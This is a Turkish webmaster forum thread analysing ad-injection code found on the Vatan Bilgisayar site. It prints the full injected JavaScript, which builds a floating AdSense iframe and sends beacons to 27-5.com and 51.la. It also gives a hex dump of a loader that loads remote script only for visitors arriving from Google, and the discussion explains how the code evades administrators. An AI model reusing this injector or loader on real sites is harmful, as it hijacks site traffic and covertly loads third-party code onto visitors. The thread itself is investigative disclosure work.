• 03-08-2013, 21:49:03
    #55
    Koda göre vatan'ın sitesine girmişler.


    Alıntı
    var SE_ISLOADER=false;
    var SE_ISLOADER_START=false;
    function SE_ADLINK_FUNC(id,w,h,l,r,adbody,onbclick,options)
    {
    if(!SE_ISLOADER_START&&window["SE_LOADEND_START"])
    {
    SE_ISLOADER_START=true;
    if(window["SE_LOADEND_START"]()=='exit')return
    }
    if(id=="")id+=new Date().getTime();
    var se_bg=document.createElement("div");
    se_bg.id="SE_ADLINK_LAY_"+id;
    var lr=(l>=0)?"left:"+l+"px;
    ":"right:"+r+"px;
    ";
    se_bg.style.cssText="width:"+w+";
    height:"+(h+options.XNHeight)+"px;
    position:fixed;
    _position:absolute;
    bottom:0px;
    "+lr+"z-index:2147483647;
    border:0px;
    padding:0px;
    margin:0px";
    document.body.appendChild(se_bg);
    var se_cdiv=document.createElement("div");
    se_cdiv.style.cssText="width:"+w+"px;
    height:"+h+"px;
    border:0px;
    padding:0px;
    margin:0px";
    se_bg.appendChild(se_cdiv);
    if(!window.XMLHttpRequest)
    {
    window.attachEvent("onscroll",function()
    {
    SE_AUTOPOSTION(id,h+options.XNHeight)
    }
    )
    }
    if(options.XButton)
    {
    var se_nobut=document.createElement("div");
    se_nobut.style.cssText="width:"+w+"px;
    height:"+options.XNHeight+"px;
    padding:0px;
    margin:0px;
    background-color:#ccc";
    se_nobut.innerHTML=options.XNCode;
    se_bg.appendChild(se_nobut);
    var slr=(options.XLeft>=0)?"left:"+options.XLeft+"px;
    ":"right:"+options.XRight+"px;
    ";
    var stb=(options.XTop>=0)?"top:"+options.XTop+"px;
    ":"bottom:"+options.XBottom+"px;
    ";
    var se_button=document.createElement("a");
    se_button.style.cssText="position:absolute;
    padding:0px;
    margin:0px;
    height:"+options.XHeight+"px;
    "+slr+";
    "+stb+"background-color:#ccc;
    color:#000;
    z-index:2147483647;
    text-decoration:none;
    cursor: pointer;
    font-size:12px;
    font-family:Arial;
    font-weight:bold;
    ";
    se_button.innerHTML="<div style='padding:1px;
    padding-left:5px;
    padding-right:5px;
    margin:0px;
    text-align:center'>X <span style='font-weight:normal;
    '>Close</span></div>";
    se_button.href="#";
    se_button.onclick=function()
    {
    SE_HIDDENAD_RUN(id);
    if(onbclick)return onbclick(this);
    return false
    };
    se_button.onmouseover=function()
    {
    this.style.backgroundColor="#ff3300";
    this.style.color="#fff"
    };
    se_button.onmouseout=function()
    {
    this.style.backgroundColor="#ccc";
    this.style.color="#000"
    };
    se_bg.appendChild(se_button)
    }
    var se_body=document.createElement("iframe");
    se_body.id="SE_ADFRAME_"+id;
    se_body.border=0;
    se_body.frameBorder=0;
    se_body.scrolling="no";
    se_body.style.width=w+"px";
    se_body.style.height=h+"px";
    se_cdiv.appendChild(se_body);
    var se_content=se_body.contentWindow.document;
    se_content.writeln("<!DOCTYPE html><html><head><style type='text/css'>body
    {
    margin:0px;
    background-color:#fff;

    }
    </style></head><body scroll='no'>");
    se_content.writeln(adbody);
    se_content.writeln("</body></html>");
    setTimeout(function()
    {
    document.getElementById("SE_ADFRAME_"+id).contentW indow.document.close()
    }
    ,2000);
    if(!SE_ISLOADER&&window["SE_LOADEND_RUN"])
    {
    window["SE_LOADEND_RUN"]();
    SE_ISLOADER=true
    }
    }
    var SE_DEFAULT_OPTIONS=
    {
    XButton:true,XLeft:-1,XRight:0,XTop:-1,XBottom:0,XHeight:16,XNHeight:16,XNCode:'&nbsp;
    ',Copy:function()
    {
    var _element=
    {
    };
    for(var item in this)
    {
    _element[item]=this[item]
    }
    return _element
    }
    };
    function SE_SHOWAD_RUN(id,w,h,l,r,adbody,onbclick,options)
    {
    if(!options)options=SE_DEFAULT_OPTIONS;
    if(!document.body)
    {
    setTimeout(function()
    {
    SE_SHOWAD_RUN(id,w,h,l,r,adbody,onbclick,options)
    }
    ,1000);
    return
    }
    SE_ADLINK_FUNC(id,w,h,l,r,adbody,onbclick,options)
    }
    function SE_AUTOPOSTION(id,top)
    {
    var se_bg=document.getElementById("SE_ADLINK_LAY_"+id) ;
    if(se_bg)se_bg.style.top=document.body.scrollTop+d ocument.body.clientHeight-top+"px"
    }
    function SE_HIDDENAD_RUN(id)
    {
    var se_bg=document.getElementById("SE_ADLINK_LAY_"+id) ;
    if(se_bg)se_bg.style.display="none"
    }
    function SE_SET_LOADFUNC(func)
    {
    SE_ISLOADER=false;
    window["SE_LOADEND_RUN"]=func
    }
    function SE_SET_LOADSTART(func)
    {
    SE_ISLOADER_START=false;
    window["SE_LOADEND_START"]=func
    }
    function SE_LA(id)
    {
    (new Image()).src="http://img.users.51.la/"+id+".asp"
    }
    (function()
    {
    SE_SET_LOADSTART(function()
    {
    var scripts=document.getElementsByTagName("script");
    for(var i=0;
    i<scripts.length;
    i++)
    {
    if(scripts[i].src.indexOf("/pagead2.")>-1)
    {
    SE_LA('15940000');
    return''
    }
    }
    }
    );
    var _adc='<scr'+'ipt type="text/javascript">';
    _adc+='google_ad_client = "ca-pub-0552135711235860";
    ';
    _adc+='google_ad_slot = "3295881345";
    ';
    _adc+='google_ad_width = 336;
    ';
    _adc+='google_ad_height = 280;
    ';
    _adc+='</scr'+'ipt>';
    _adc+='<scr'+'ipt type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></scr'+'ipt>';
    SE_SHOWAD_RUN('',336,280,300,0,_adc,function()
    {
    (new Image()).src="http://a.27-5.com/click.ashx";
    return false
    }
    )
    }
    )();
    (new Image()).src="http://img.users.51.la/1458087.asp";
    (new Image()).src="http://a.27-5.com/run";
  • 03-08-2013, 21:57:13
    #56
    Bu da yukarıda paylaştığım kodun ilk geldiği yer:

    URL:
    http://o.27-5.com/io
    İÇERİĞİ:
    00000000:  28  66  75  6e  63  74  69  6f  6e  28  64  2c  66  29  7b  0d  (function(d,f){.
    00000010:  0a  09  69  66  28  77  69  6e  64  6f  77  2e  52  75  6e  6e  ..if(window.Runn
    00000020:  69  6e  67  53  65  74  74  69  6e  67  73  29  0d  0a  09  09  ingSettings)....
    00000030:  72  65  74  75  72  6e  3b  0d  0a  09  77  69  6e  64  6f  77  return;...window
    00000040:  2e  52  75  6e  6e  69  6e  67  53  65  74  74  69  6e  67  73  .RunningSettings
    00000050:  20  3d  20  74  72  75  65  3b  0d  0a  09  0d  0a  09  69  66   = true;......if
    00000060:  28  20  66  28  64  2c  27  67  6f  6f  67  6c  65  2e  27  29  ( f(d,'google.')
    00000070:  26  26  66  28  64  2c  27  71  3d  27  29  20  29  20  7b  0d  &&f(d,'q=') ) {.
    00000080:  0a  09  09  64  2e  77  72  69  74  65  28  27  3c  73  63  72  ...d.write('<scr
    00000090:  69  70  74  20  73  72  63  3d  22  68  74  74  70  3a  2f  2f  ipt src="http://
    000000a0:  61  2e  32  37  2d  35  2e  63  6f  6d  2f  61  2f  34  33  31  a.27-5.com/a/431
    000000b0:  39  36  39  31  35  35  36  30  2e  70  68  70  3f  6c  61  6e  96915560.php?***
    000000c0:  67  3d  67  77  26  77  6b  3d  30  22  3e  3c  2f  73  63  72  g=gw&wk=0"></scr
    000000d0:  69  70  74  3e  27  29  3b  0d  0a  09  7d  0d  0a  7d  29  28  ipt>');...}..})(
    000000e0:  64  6f  63  75  6d  65  6e  74  2c  66  75  6e  63  74  69  6f  document,functio
    000000f0:  6e  28  64  2c  72  29  20  7b  20  72  65  74  75  72  6e  20  n(d,r) { return 
    00000100:  64  2e  72  65  66  65  72  72  65  72  2e  69  6e  64  65  78  d.referrer.index
    00000110:  4f  66  28  72  29  3e  2d  31  3b  7d  20  29  3b              Of(r)>-1;} );
    Görüldüğü üzere kod önce bakıyor ziyaretçi Google kaynaklı mı, Google kaynaklı ise <script></script> etiketleri arasındaki bağlantıyı çağırıyor.
    Çağırılan bu bağlantıda ise yukarıda paylaştığım ve @Webbilgim tarafından açık hali verilen kod çağırılıyor.
  • 03-08-2013, 22:50:23
    #57
    Kimlik doğrulama veya yönetimden onay bekliyor.
    İyi de bunlar neye yarıyor vatan hala ekipleri görmezden geliyor olayı.Düzeltsinler o zaman. kendileri için bu büyük sorun bence demek ki sistemlerini kuran yöneten ekip bir işe yaramıyor.
  • 03-08-2013, 23:53:38
    #58
    Ben de pub idlerine göre adsense hesabının hangi sitelerde kullanıldığını vereyim:

  • 03-08-2013, 23:55:17
    #59
    Üyeliği durduruldu
    sinan3 adlı üyeden alıntı: mesajı görüntüle
    İyi de bunlar neye yarıyor vatan hala ekipleri görmezden geliyor olayı.Düzeltsinler o zaman. kendileri için bu büyük sorun bence demek ki sistemlerini kuran yöneten ekip bir işe yaramıyor.
    Ve aylardır bu şekilde çalışıyor
  • 04-08-2013, 01:49:46
    #60
    EgemenPolat adlı üyeden alıntı: mesajı görüntüle
    Ve aylardır bu şekilde çalışıyor
    Daha da ilginci Google Adsense'den (sikayet etmeme ragmen) atilmiyor
  • 04-08-2013, 01:56:09
    #61
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Tebrikler arkadaşlar efsane çözüldü sonunda... Bununla ilgili çeşitli başlıklar açıldı hep kullanıcı bilgisayarlarındaki virüsler üzerinden olabileceği yorumlanmıştı...
  • 04-08-2013, 02:31:42
    #62
    Nevermind adlı üyeden alıntı: mesajı görüntüle
    Tebrikler arkadaşlar efsane çözüldü sonunda... Bununla ilgili çeşitli başlıklar açıldı hep kullanıcı bilgisayarlarındaki virüsler üzerinden olabileceği yorumlanmıştı...
    Aslinda yayinladigim iPod ekran goruntusu ile sorunun bilgisayardan olmadigini kanitlamistik ama yine de Adsense kodlarini goremeyen bir cok arkadasimiz inanmak istememis olabilirdi. Sukur pub-id dahi yayinladik acik acik. Ayrica ref kontrolune girip sadece Google ziyaretcilerine gostermesini saglayan kodu yayinlayarak son noktayi koyduk. Virus ziyaretci ayirt etmez hepsine basar reklami.

    Simdi bu kodlarin Vatan Bilgisayar uzerinde nasil calistigini bulmaya geldi.
    Ben bu calismayi iftar oncesi yapmistim kisitli zamanda sayfa uzerindeki inceleyebildigim kadar nesneyi inceledim ama garip bir duruma rastlamadim. Bu konuda da tahminim bunun web sunucusu kaynakli bir sorun olabilecegi.

    Gelelim Vatan'in bunu fark etmemesine;
    Arkadaslar burada bir cogumuz webmaster geciniyoruz ama bu kodlarin israrla virus kaynakli oldugunu iddia ediyoruz. Hayir gercekten merak ediyorum bu tur durumlara hic rast gelmediniz mi ki boyle bir tepki verdiniz anlayamadim, neyse.
    Kod ustaca tasarlanmis ve sistem yoneticilerinin fark edememesi icin elinden geleni yapiyor;
    Ornegin kod belli saat araliklarinda devreye giriyor ve sadece Google ziyaretcilerine gorunuyor. Bu da sistem yoneticilerinin fark etmesini zorlastiriyor.
    Ayrica belirttigim gibi script kaynakli degil de web sunucu kaynakli ise kimsenin aklina sunucuyu kontrol etmek gelmiyor olabilir. Script kodlari incelenir bir anormal durum gorulmezse temiz denir birakilir. Vatan'da da durum boyle gorunuyor ben elimden geldigince kendilerine yardimci olmaya calisiyorum. İnsallah bir an once duzeltirler.
  • 04-08-2013, 19:06:03
    #63
    Madem çin sitesi diyorsunuz . çin veya ingilizce adsense hesabı olsa sağ üstteki i adsense ikonuna tıklayınca neden türkçe olarak karşımıza çıkıyor sayfa. eğer hesap ingilizce olsa ingilizce olarak bilgilendirme sayfası çıkar. belki de adamlar hesabı ordan açtı . daha soru işaretleri bitmedi .